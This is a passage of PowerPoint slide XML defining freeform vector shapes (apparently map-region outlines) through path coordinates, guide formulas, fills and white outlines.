                    <a:lnTo>
                      <a:pt x="184" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="153"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36376" name="Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3267" y="2871"/>
                <a:ext cx="135" cy="149"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 135"/>
                  <a:gd name="T1" fmla="*/ 105 h 149"/>
                  <a:gd name="T2" fmla="*/ 121 w 135"/>
                  <a:gd name="T3" fmla="*/ 105 h 149"/>
                  <a:gd name="T4" fmla="*/ 119 w 135"/>
                  <a:gd name="T5" fmla="*/ 114 h 149"/>
                  <a:gd name="T6" fmla="*/ 111 w 135"/>
                  <a:gd name="T7" fmla="*/ 117 h 149"/>
                  <a:gd name="T8" fmla="*/ 110 w 135"/>
                  <a:gd name="T9" fmla="*/ 123 h 149"/>
                  <a:gd name="T10" fmla="*/ 101 w 135"/>
                  <a:gd name="T11" fmla="*/ 137 h 149"/>
                  <a:gd name="T12" fmla="*/ 99 w 135"/>
                  <a:gd name="T13" fmla="*/ 146 h 149"/>
                  <a:gd name="T14" fmla="*/ 95 w 135"/>
                  <a:gd name="T15" fmla="*/ 148 h 149"/>
                  <a:gd name="T16" fmla="*/ 87 w 135"/>
                  <a:gd name="T17" fmla="*/ 144 h 149"/>
                  <a:gd name="T18" fmla="*/ 69 w 135"/>
                  <a:gd name="T19" fmla="*/ 129 h 149"/>
                  <a:gd name="T20" fmla="*/ 69 w 135"/>
                  <a:gd name="T21" fmla="*/ 123 h 149"/>
                  <a:gd name="T22" fmla="*/ 10 w 135"/>
                  <a:gd name="T23" fmla="*/ 90 h 149"/>
                  <a:gd name="T24" fmla="*/ 8 w 135"/>
                  <a:gd name="T25" fmla="*/ 73 h 149"/>
                  <a:gd name="T26" fmla="*/ 14 w 135"/>
                  <a:gd name="T27" fmla="*/ 65 h 149"/>
                  <a:gd name="T28" fmla="*/ 24 w 135"/>
                  <a:gd name="T29" fmla="*/ 55 h 149"/>
                  <a:gd name="T30" fmla="*/ 28 w 135"/>
                  <a:gd name="T31" fmla="*/ 46 h 149"/>
                  <a:gd name="T32" fmla="*/ 26 w 135"/>
                  <a:gd name="T33" fmla="*/ 37 h 149"/>
                  <a:gd name="T34" fmla="*/ 19 w 135"/>
                  <a:gd name="T35" fmla="*/ 27 h 149"/>
                  <a:gd name="T36" fmla="*/ 18 w 135"/>
                  <a:gd name="T37" fmla="*/ 17 h 149"/>
                  <a:gd name="T38" fmla="*/ 14 w 135"/>
                  <a:gd name="T39" fmla="*/ 12 h 149"/>
                  <a:gd name="T40" fmla="*/ 16 w 135"/>
                  <a:gd name="T41" fmla="*/ 3 h 149"/>
                  <a:gd name="T42" fmla="*/ 23 w 135"/>
                  <a:gd name="T43" fmla="*/ 1 h 149"/>
                  <a:gd name="T44" fmla="*/ 36 w 135"/>
                  <a:gd name="T45" fmla="*/ 0 h 149"/>
                  <a:gd name="T46" fmla="*/ 40 w 135"/>
                  <a:gd name="T47" fmla="*/ 0 h 149"/>
                  <a:gd name="T48" fmla="*/ 50 w 135"/>
                  <a:gd name="T49" fmla="*/ 2 h 149"/>
                  <a:gd name="T50" fmla="*/ 60 w 135"/>
                  <a:gd name="T51" fmla="*/ 5 h 149"/>
                  <a:gd name="T52" fmla="*/ 79 w 135"/>
                  <a:gd name="T53" fmla="*/ 16 h 149"/>
                  <a:gd name="T54" fmla="*/ 93 w 135"/>
                  <a:gd name="T55" fmla="*/ 19 h 149"/>
                  <a:gd name="T56" fmla="*/ 100 w 135"/>
                  <a:gd name="T57" fmla="*/ 19 h 149"/>
                  <a:gd name="T58" fmla="*/ 107 w 135"/>
                  <a:gd name="T59" fmla="*/ 12 h 149"/>
                  <a:gd name="T60" fmla="*/ 118 w 135"/>
                  <a:gd name="T61" fmla="*/ 7 h 149"/>
                  <a:gd name="T62" fmla="*/ 123 w 135"/>
                  <a:gd name="T63" fmla="*/ 10 h 149"/>
                  <a:gd name="T64" fmla="*/ 135 w 135"/>
                  <a:gd name="T65" fmla="*/ 12 h 149"/>
                  <a:gd name="T66" fmla="*/ 123 w 135"/>
                  <a:gd name="T67" fmla="*/ 33 h 149"/>
                  <a:gd name="T68" fmla="*/ 123 w 135"/>
                  <a:gd name="T69" fmla="*/ 48 h 149"/>
                  <a:gd name="T70" fmla="*/ 123 w 135"/>
                  <a:gd name="T71" fmla="*/ 58 h 149"/>
                  <a:gd name="T72" fmla="*/ 123 w 135"/>
                  <a:gd name="T73" fmla="*/ 83 h 149"/>
                  <a:gd name="T74" fmla="*/ 132 w 135"/>
                  <a:gd name="T75" fmla="*/ 102 h 149"/>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35"/>
                  <a:gd name="T115" fmla="*/ 0 h 149"/>
                  <a:gd name="T116" fmla="*/ 135 w 135"/>
                  <a:gd name="T117" fmla="*/ 149 h 149"/>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35" h="149">
                    <a:moveTo>
                      <a:pt x="132" y="102"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="128" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="102"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36377" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3267" y="2871"/>
                <a:ext cx="135" cy="149"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 135"/>
                  <a:gd name="T1" fmla="*/ 105 h 149"/>
                  <a:gd name="T2" fmla="*/ 121 w 135"/>
                  <a:gd name="T3" fmla="*/ 105 h 149"/>
                  <a:gd name="T4" fmla="*/ 119 w 135"/>
                  <a:gd name="T5" fmla="*/ 114 h 149"/>
                  <a:gd name="T6" fmla="*/ 111 w 135"/>
                  <a:gd name="T7" fmla="*/ 117 h 149"/>
                  <a:gd name="T8" fmla="*/ 110 w 135"/>
                  <a:gd name="T9" fmla="*/ 123 h 149"/>
                  <a:gd name="T10" fmla="*/ 101 w 135"/>
                  <a:gd name="T11" fmla="*/ 137 h 149"/>
                  <a:gd name="T12" fmla="*/ 99 w 135"/>
                  <a:gd name="T13" fmla="*/ 146 h 149"/>
                  <a:gd name="T14" fmla="*/ 95 w 135"/>
                  <a:gd name="T15" fmla="*/ 148 h 149"/>
                  <a:gd name="T16" fmla="*/ 87 w 135"/>
                  <a:gd name="T17" fmla="*/ 144 h 149"/>
                  <a:gd name="T18" fmla="*/ 69 w 135"/>
                  <a:gd name="T19" fmla="*/ 129 h 149"/>
                  <a:gd name="T20" fmla="*/ 69 w 135"/>
                  <a:gd name="T21" fmla="*/ 123 h 149"/>
                  <a:gd name="T22" fmla="*/ 10 w 135"/>
                  <a:gd name="T23" fmla="*/ 90 h 149"/>
                  <a:gd name="T24" fmla="*/ 8 w 135"/>
                  <a:gd name="T25" fmla="*/ 73 h 149"/>
                  <a:gd name="T26" fmla="*/ 14 w 135"/>
                  <a:gd name="T27" fmla="*/ 65 h 149"/>
                  <a:gd name="T28" fmla="*/ 24 w 135"/>
                  <a:gd name="T29" fmla="*/ 55 h 149"/>
                  <a:gd name="T30" fmla="*/ 28 w 135"/>
                  <a:gd name="T31" fmla="*/ 46 h 149"/>
                  <a:gd name="T32" fmla="*/ 26 w 135"/>
                  <a:gd name="T33" fmla="*/ 37 h 149"/>
                  <a:gd name="T34" fmla="*/ 19 w 135"/>
                  <a:gd name="T35" fmla="*/ 27 h 149"/>
                  <a:gd name="T36" fmla="*/ 18 w 135"/>
                  <a:gd name="T37" fmla="*/ 17 h 149"/>
                  <a:gd name="T38" fmla="*/ 14 w 135"/>
                  <a:gd name="T39" fmla="*/ 12 h 149"/>
                  <a:gd name="T40" fmla="*/ 16 w 135"/>
                  <a:gd name="T41" fmla="*/ 3 h 149"/>
                  <a:gd name="T42" fmla="*/ 23 w 135"/>
                  <a:gd name="T43" fmla="*/ 1 h 149"/>
                  <a:gd name="T44" fmla="*/ 36 w 135"/>
                  <a:gd name="T45" fmla="*/ 0 h 149"/>
                  <a:gd name="T46" fmla="*/ 40 w 135"/>
                  <a:gd name="T47" fmla="*/ 0 h 149"/>
                  <a:gd name="T48" fmla="*/ 50 w 135"/>
                  <a:gd name="T49" fmla="*/ 2 h 149"/>
                  <a:gd name="T50" fmla="*/ 60 w 135"/>
                  <a:gd name="T51" fmla="*/ 5 h 149"/>
                  <a:gd name="T52" fmla="*/ 79 w 135"/>
                  <a:gd name="T53" fmla="*/ 16 h 149"/>
                  <a:gd name="T54" fmla="*/ 93 w 135"/>
                  <a:gd name="T55" fmla="*/ 19 h 149"/>
                  <a:gd name="T56" fmla="*/ 100 w 135"/>
                  <a:gd name="T57" fmla="*/ 19 h 149"/>
                  <a:gd name="T58" fmla="*/ 107 w 135"/>
                  <a:gd name="T59" fmla="*/ 12 h 149"/>
                  <a:gd name="T60" fmla="*/ 118 w 135"/>
                  <a:gd name="T61" fmla="*/ 7 h 149"/>
                  <a:gd name="T62" fmla="*/ 123 w 135"/>
                  <a:gd name="T63" fmla="*/ 10 h 149"/>
                  <a:gd name="T64" fmla="*/ 135 w 135"/>
                  <a:gd name="T65" fmla="*/ 12 h 149"/>
                  <a:gd name="T66" fmla="*/ 123 w 135"/>
                  <a:gd name="T67" fmla="*/ 33 h 149"/>
                  <a:gd name="T68" fmla="*/ 123 w 135"/>
                  <a:gd name="T69" fmla="*/ 48 h 149"/>
                  <a:gd name="T70" fmla="*/ 123 w 135"/>
                  <a:gd name="T71" fmla="*/ 58 h 149"/>
                  <a:gd name="T72" fmla="*/ 123 w 135"/>
                  <a:gd name="T73" fmla="*/ 83 h 149"/>
                  <a:gd name="T74" fmla="*/ 132 w 135"/>
                  <a:gd name="T75" fmla="*/ 102 h 149"/>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35"/>
                  <a:gd name="T115" fmla="*/ 0 h 149"/>
                  <a:gd name="T116" fmla="*/ 135 w 135"/>
                  <a:gd name="T117" fmla="*/ 149 h 149"/>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35" h="149">
                    <a:moveTo>
                      <a:pt x="132" y="102"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="128" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="102"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36378" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3392" y="2741"/>
                <a:ext cx="27" cy="30"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 27"/>
                  <a:gd name="T1" fmla="*/ 29 h 30"/>
                  <a:gd name="T2" fmla="*/ 14 w 27"/>
                  <a:gd name="T3" fmla="*/ 28 h 30"/>
                  <a:gd name="T4" fmla="*/ 11 w 27"/>
                  <a:gd name="T5" fmla="*/ 27 h 30"/>
                  <a:gd name="T6" fmla="*/ 5 w 27"/>
                  <a:gd name="T7" fmla="*/ 29 h 30"/>
                  <a:gd name="T8" fmla="*/ 1 w 27"/>
                  <a:gd name="T9" fmla="*/ 30 h 30"/>
                  <a:gd name="T10" fmla="*/ 0 w 27"/>
                  <a:gd name="T11" fmla="*/ 21 h 30"/>
                  <a:gd name="T12" fmla="*/ 0 w 27"/>
                  <a:gd name="T13" fmla="*/ 18 h 30"/>
                  <a:gd name="T14" fmla="*/ 1 w 27"/>
                  <a:gd name="T15" fmla="*/ 17 h 30"/>
                  <a:gd name="T16" fmla="*/ 4 w 27"/>
                  <a:gd name="T17" fmla="*/ 12 h 30"/>
                  <a:gd name="T18" fmla="*/ 8 w 27"/>
                  <a:gd name="T19" fmla="*/ 5 h 30"/>
                  <a:gd name="T20" fmla="*/ 9 w 27"/>
                  <a:gd name="T21" fmla="*/ 5 h 30"/>
                  <a:gd name="T22" fmla="*/ 10 w 27"/>
                  <a:gd name="T23" fmla="*/ 4 h 30"/>
                  <a:gd name="T24" fmla="*/ 13 w 27"/>
                  <a:gd name="T25" fmla="*/ 5 h 30"/>
                  <a:gd name="T26" fmla="*/ 16 w 27"/>
                  <a:gd name="T27" fmla="*/ 6 h 30"/>
                  <a:gd name="T28" fmla="*/ 20 w 27"/>
                  <a:gd name="T29" fmla="*/ 0 h 30"/>
                  <a:gd name="T30" fmla="*/ 20 w 27"/>
                  <a:gd name="T31" fmla="*/ 0 h 30"/>
                  <a:gd name="T32" fmla="*/ 25 w 27"/>
                  <a:gd name="T33" fmla="*/ 4 h 30"/>
                  <a:gd name="T34" fmla="*/ 27 w 27"/>
                  <a:gd name="T35" fmla="*/ 7 h 30"/>
                  <a:gd name="T36" fmla="*/ 27 w 27"/>
                  <a:gd name="T37" fmla="*/ 10 h 30"/>
                  <a:gd name="T38" fmla="*/ 26 w 27"/>
